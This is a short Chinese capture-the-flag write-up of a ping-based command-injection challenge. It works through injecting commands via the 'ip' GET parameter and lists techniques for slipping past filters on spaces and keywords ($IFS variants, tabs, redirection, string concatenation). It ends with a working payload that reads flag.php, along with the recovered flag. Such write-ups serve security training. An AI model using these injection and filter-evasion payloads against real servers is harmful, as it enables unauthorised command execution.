打开链接
/?ip=(GET传参方式)
这题跟[ACTF2020 新生赛]Exec1差不多
那我们先看看有啥文件
/?ip=;ls或者/?ip=127.0.0.1;ls
(ip地址写啥都行,其中127.0.0.1ping的是本机的地址)
发现里面有flag.php文件
但是当我去查看flag文件时,发现flag、空格、/、\等符号都被过滤了,当时也在这卡了很久
下面来总结一下常见的绕过方法
1.空格
(1)%20
(2)%09
(3)<>
(4)$IFS$9、 ${IFS}、$IFS
绕过flag字符:采用字符串拼接的方式
例如:a=g;fla$a -->flag
a=ag;fl$a -->flag
然后我们就构造playload获取flag
/?ip=127.0.0.1;a=ag;cat$IFS$9fl$a.php
flag{99babff4-2dc1-4bc4-9962-1a897ef1686c}
最后如果打开index,php看的话会发现过滤了很多字符